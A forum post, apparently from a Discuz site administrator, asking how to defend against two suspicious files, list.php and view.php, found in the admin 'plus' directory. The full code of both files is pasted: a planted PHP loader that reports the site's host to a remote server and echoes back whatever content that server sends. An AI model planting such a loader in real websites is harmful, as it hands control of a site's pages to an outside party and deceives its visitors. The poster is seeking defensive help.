去评论
dz插件网

检查后台台plus多了这两个文件

迪巴拉
2022/04/01 18:54:08

list.php
  1. <?phpset_time_limit(0);header("Content-Type: text/html;charset=utf-8");$Remote_server = "http://lao.fre09.com/"; $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);function getHTTPPage($url) {        $opts = array(          'http'=>array(                'method'=>"GET",                'header'=>"User-Agent: aQ0O010O"          )        );        $context = stream_context_create($opts);        $html = @file_get_contents($url, false, $context);        if (empty($html)) {                exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");        }                return $html;} echo $Content_mb;?>
view.php
  1. <?phpset_time_limit(0);header("Content-Type: text/html;charset=utf-8");$Remote_server = "http://lao.fre09.com/"; $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];$Content_mb=getHTTPPage($Remote_server."/index.php?host=".$host_name);function getHTTPPage($url) {        $opts = array(          'http'=>array(                'method'=>"GET",                'header'=>"User-Agent: aQ0O010O"          )        );        $context = stream_context_create($opts);        $html = @file_get_contents($url, false, $context);        if (empty($html)) {                exit("<p align='center'><font color='red'><b>Connection Error!</b></font></p>");        }                return $html;} echo $Content_mb;?>
这个怎么操作防止攻击